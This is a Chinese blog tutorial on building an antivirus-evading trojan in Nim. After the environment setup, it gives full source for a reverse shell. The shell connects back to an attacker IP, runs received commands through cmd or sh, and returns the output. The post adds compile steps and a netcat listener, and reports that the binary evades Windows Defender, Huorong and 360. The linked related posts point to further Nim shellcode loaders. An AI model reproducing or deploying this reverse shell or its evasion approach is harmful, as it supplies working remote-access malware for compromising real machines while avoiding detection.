Nim之套接字免杀学习

最新推荐文章于 2024-05-31 09:52:38 发布
最新推荐文章于 2024-05-31 09:52:38 发布
阅读量6k 收藏 7
点赞数 1
分类专栏: 免杀和bypass 文章标签: 乌鸦安全 Nim 免杀 Bypass
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/123672531
版权

微信公众号:乌鸦安全

更新时间:2022.03.18

说明

本文代码部分参考:

https://www.bilibili.com/video/BV1Yr4y1Y7qP/

1. 前言

Nim这个语言属于比较小众的语言,所以被杀软盯的可能小了很多,免杀上有奇效,本次学习是看到了一个使用Nim写的Socket连接的功能,然后封装为木马,目前依旧是免杀Windows Defender的;

参考链接:https://www.bilibili.com/video/BV1Yr4y1Y7qP/ 在这里我从环境配置到文件打包,做一个整理。

2. nim介绍

Nim 是一种静态类型的、编译型、系统编程语言。它结合了其他成熟语言的成功概念(如 PythonAda 和 Modula)。(参考:https://nim-lang-cn.org/)

3. 环境准备

测试机1:Windows 10 Windows Defender最新版 

测试机2:Windows Server2019 、Windows Defender最新版火绒联网最新版 

攻击机:Kali Linux

在以下测试中,均关闭Windows Defender最新版的自动上传样本功能。

4. Nim环境配置

4.1 Nim安装

https://nim-lang.org/install.html上选择下载Windows

 

然后选择x64位的下载:

 

Chrome浏览器下载的时候,会报毒:

 

在这里直接忽略就行了:

 

将得到的文件解压,然后再移动到C盘目录下(这个无所谓):

 

复制bin目录下的路径: C:\nim-1.6.4_x64\nim-1.6.4\bin

 

将该路径添加到环境变量中去:

 

按照这个步骤,选择系统变量之后,找到Path,编辑,再新建:

 

将信息填入之后,保存,打开cmd命令窗口,输入nim

 

此时代表Nim安装成功;

4.2 安装MinGW

MinGW是为Nim编译所必需的,MinGW主要是编译CC++代码用的,在这里一共有两种方式:

  • • 直接下载MinGW安装

  • • 利用Nim自带的程序finish.exe安装

4.2.1 直接安装MinGW

首先按照教程,安装MinGW 在这里有下载链接地址:

https://sourceforge.net/projects/mingw-w64/files/ 

下载最新版x64位版本:

64位系统建议选择x86_64-posix-sjlj 32位系统建议选择i686-posix-sjlj

MingGW64 版本区别于各版本说明 https://www.pcyo.cn/linux/20181212/216.html

将解压之后的文件放入到C盘根目录下:

 

然后来到bin目录下,使用命令行检查当前的gcc版本:

gcc.exe --version

 

然后就是和上面一样,设置系统环境变量:

控制面板\系统和安全\系统中,选择高级系统设置\高级\环境变量,设置环境变量:

 

MinGW添加到系统环境变量中去:

 

完成之后,确认退出:在新的命令行中尝试输入gcc.exe --version

 

此时证明MinGW安装成功。

4.2.2 利用Nim自带的程序finish.exe安装

Nim的环境中,有一个程序是finish.exe,可以利用该程序下载MinGW的安装包:

 

在命令行里面启动这个文件,一路Y下去之后,下载完成,利用自带的7z压缩工具进行解压,解压之后就是手动配置环境变量。

下载完成之后,来到下载文件的目录: C:\nim-1.6.4_x64\nim-1.6.4\dist\mingw64\bin 复制该路径,添加到系统变量中去,确认之后,打开一个新的cmd窗口,检测环境是否正常:

4.2.3 注意事项

上述的两种方法中只能使用一种,而且前提是先不使用Nim进行编译工作,否则会由于缓存问题导致第二种线上安装的方式编译出错。

4.3 安装winim库

下载地址:https://github.com/khchen/winim 在当前路径下,使用nimble install 安装即可。

5. Nim之套接字免杀学习

5.1 Socket代码

以下代码参考:

https://www.bilibili.com/video/BV1Yr4y1Y7qP/ 

在下面的代码里主要是需要自定义攻击机的ip和反弹的端口:

import net  
import osproc
import os 


var ip = "192.168.238.138"
var port = 55

var socket = newSocket()
var finalcommand : string

while true:
    try:
        socket.connect(ip, Port(port))
        while true:
            try:
                socket.send("<helloshell>")
                var command = socket.recvLine()
                if command == "bye":
                    socket.send("exit")
                    socket.close()
                    system.quit(0)
                if system.hostOS == "windows":
                    finalcommand = "cmd /C" & command
                else:
                    finalcommand = "/bin/sh -c" & command
                
                var (cmdres, _) = execCmdEx(finalcommand)
                socket.send(cmdres)
            except:
                socket.close()
                system.quit()
    except:
        echo ""
        sleep(5000)
        continue

其中定义攻击机的 ip :192.168.238.138,端口是55

5.2 源码编译

在得到代码之后,在上述配置好Nim环境的Windows10上进行编译:

nim c -d:mingw Nim_socket.nim

编译成功之后会得到一个exe可执行文件。

5.3 上线测试

首先在kali攻击机上开启监听: nc -lvp 55

然后在Windows的cmd命令行中执行木马:

等待一下之后,反弹成功:

5.4 免杀测试

Windows Defender

火绒

 

360按位置查杀

360按位置查杀,最好不要云查杀,不然样本会被上传。

6. 总结

在以上的测试中,主要是参考了以下的链接:https://www.bilibili.com/video/BV1Yr4y1Y7qP/ 

在作者的说明中,该免杀理论上还可以过卡巴斯基,由此也看到了Nim代码的魅力,也看到了免杀上有很多厉害的师傅;

静态免杀只是皮毛,动态免杀比较关键;继续向各位师傅学习学习。。。。

微信公众号:乌鸦安全

乌鸦安全
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
免杀对抗-Nim语言免杀-加载工具+加载方式
xiaoheizi的博客
09-28 710
shellcodeCallback.nim下载:https://github.com/5598ca98-f0c8-4594-befe-330b23c2b7c4。nimcrypto,在有nimcrypto.nimble文件的文件夹(一般在根目录)启动命令行,执行:nimble install。1.下载nimPNG,在有nimPNG.nimble文件的文件夹(一般在根目录)启动命令行,执行:nimble install。4.再次执行:./lsp.exe de 生成的图片.png shellcode文件 密码。
Visual Studio Code -> VSCode 开发环境搭建 ---- Python 开发环境搭建 及 代码运行(code runner 插件)
严文年 - 原创笔记
12-10 2798
VSCode 开发环境搭建 ----Python开发环境搭建 及 代码运行 平台:Windows 10 IDE:VisualStudioCode :VSCode 功能环境:Python 代码运行环境 目录 1. 开发平台确认 2. VSCode 下载及安装 【1】. VSCode下载: 【2】. VSCode安装: 3. VSCode 插件安装 【1】. VSCo...
探秘BypassAv-web:一款基于Nim的智能免杀工具
最新发布
gitblog_00040的博客
05-31 382
探秘BypassAv-web:一款基于Nim的智能免杀工具 项目地址:https://gitcode.com/M-Kings/BypassAv-web 在网络安全研究的深水区,探索与反制始终是双翼齐飞的主题。今天,我们将聚焦于一款名为BypassAv-web的开源项目,它不仅代表了技术边界的一次飞跃,更是一个面向安全研究人员的技术研讨宝箱。让我们一同揭开它的神秘面纱,探讨其技术内核,以及如何在实战...
一款nim语言的图形化免杀
The current road is different, love needs to distinguish between right and wrong
11-26 3143
简介 使用偏门语言的shellcode加载器处理免杀,一直是很流行的方案,语言也一变在变,从最开始的python免杀,go免杀;到现在的nim语言免杀nim语言生成的文件还是比较小的,大概400k左右,部分场景可以利用bitsadmin、certutil等落地执行。 目前加载器方法可以静态过某数字,但执行beacon还是会掉线,有待进一步优化。 环境搭建 需要下载nim语言环境: Download - Nim Programming Language 提供了windows版本和un
nim语言在不同操作系统安装
问题很多的小明
02-09 742
Nim语言基础环境安装
nim语言的学习
谢公子的博客
12-13 3814
nim Nim是一个新型的静态类型、命令式编程语言,支持过程式、函数式、面向对象和泛型编程风格而保持简单和高效。Nim从Lisp继承来的一个特殊特性--抽象语法树(AST)作为语言规范的一部分,可以用作创建领域特定语言的强大宏系统。Nim是一个编译型的具有垃圾收集的系统编程语言,有着极其卓越的生产/性能比。Nim的设计集中在三个E上:即效率(efficiency)、表达能力(expressiveness)和优雅(elegance)。而我们学习nim的目的就是为了做免杀。大多数杀软对于新型的偏门小类..
冷淡:将本机Nim类型序列化为字符串,流或套接字:snowman_without_snow:
02-03
Nim编程语言中,序列化是一个重要的概念,它涉及到将数据结构转化为可以在不同环境间传输的格式,如字符串、二进制流或通过网络套接字。标题"冷淡:将本机Nim类型序列化为字符串,流或套接字:snowman_without_snow...
nim-sys:通用操作系统接口的抽象
02-03
3. 网络编程模块:提供了一套网络接口,包括打开套接字、进行TCP/IP通信、处理UDP数据包等功能。这对于构建网络服务或者客户端应用程序非常有用。 4. 时间和信号模块:提供了对系统时间的获取和设置,以及处理系统...
亚述:用NIM编写的Hobby OS
02-03
这可能包括TCP/IP协议栈和简单的套接字接口。 7. **用户界面(User Interface)**:即使是Hobby OS,一个简单的命令行界面也是必不可少的。NIM的字符串处理和文本格式化功能在这方面非常有用。 亚述OS的源代码...
sequoia.nimNim的Sequoia PGP包装器
02-04
**Sequoia PGP包装器在Nim中的应用** Sequoia PGP是现代、安全且高效的OpenPGP实现,而`sequoia.nim`则是一个专门针对Nim编程语言设计的Sequoia PGP包装器。这个包装器允许Nim开发者轻松地在他们的项目中集成PGP...
asynctools:用于Nim语言的各种异步工具
02-03
Nim中,异步编程是通过协程(coroutines)和Futures来实现的,`asynctools`库进一步扩展了这些功能,提供了更丰富的异步工具,包括但不限于DNS解析、HTTP请求、TCP/UDP套接字操作等。下面我们将深入探讨`...
BypassAv-web:nim一键免杀
05-06
BypassAv-web nim一键免杀源码 仅限用于技术研究和获得正式授权的测试活动。 使用nim语言进行shellcode加载,使用时需要选择i386和AMD64 使用方法 cs attacks - packages - payload generator output 选择Raw(勾选x64时web页面上需要选择AMD64) 已知问题 windows 2008(不包含r2 sp2 等)无法运行,推测缺少vc++ 运行库 本地使用 不支持windows、mac下部署服务端 安装nim 安装nim winim模块 项目结构 code nim源代码 其余为web代码 在线地址 页面 vt查杀 i386 AMD64 功能 窗口隐藏 自动加密 虚拟机检测 实现 使用纯nim语言编写的shellcode记载器,代码基本是从之前c++版本平移过来。
NimShellCodeLoader:使用nim编写的shellcode加载器
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nimnim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成器 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
OffensiveNim:我为Nim武器化的实验(https
03-11
进攻尼姆 我的实验是将武器化以进行植入物开发和一般进攻行动。 目录 为什么选择尼姆? 直接编译为C,C ++,Objective-C和Javascript。 由于它不依赖虚拟机,因此运行时不会像其他语言(例如Golang)那样产生我喜欢的“ THICC恶意软件” 受Python启发的语法,允许快速进行本机有效负载创建和原型制作。 具有极其成熟的 (外部功能接口)功能。 避免使您实际上用C / C ++编写,并且随后避免在软件中引入很多安全问题。 从* nix / MacOS到Windows的超级容易的交叉编译,只需要您安装mingw工具链并将单个标志传递给nim编译器。 Nim编译器和生成的可执行文件支持所有主要平台,例如Windows,Linux,BSD和macOS。 甚至可以编译为Nintendo switch,IOS和Android。 请参阅《 中的“交叉编译”部分 从
大阪:用nim编写的基本端口扫描程序
02-12
1分钟50秒内在scanme.nmap.org上扫描了500个端口 在50秒内在localhost上扫描了500个端口 仅支持TCP 用“ nim c -d:ssl --threads:on -d:release main.nim”编译 用“ ./main [args] [ip]”运行 命令行参数: -r:all表示所有,:common表示1到1023,:dynamic表示1024到49151,:file表示从ports.txt检查端口,而:XY表示从x到y检查端口 -t:[线程] -ti:[超时]
nim语言在安全能力上的探讨
莫慌的博客
12-12 644
nim语言 安全 shellcode
nim等安装和winim的配置
m0_55772907的博客
05-04 996
首先我是参考下面这个的 Nim套接字免杀学习_乌鸦安全的博客-CSDN博客_nim语言Nim这个语言属于比较小众的语言,所以被杀软盯的可能小了很多,免杀上有奇效,本次学习是看到了一个使用Nim写的Socket连接的功能,然后封装为木马,目前依旧是免杀Windows Defender的;https://blog.csdn.net/csdnmmd/article/details/123672531 前面基本上不用怎么记录,只是我的环境变量一直加不进去,所以我直接把bin下的nim.exe复制到 wini
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值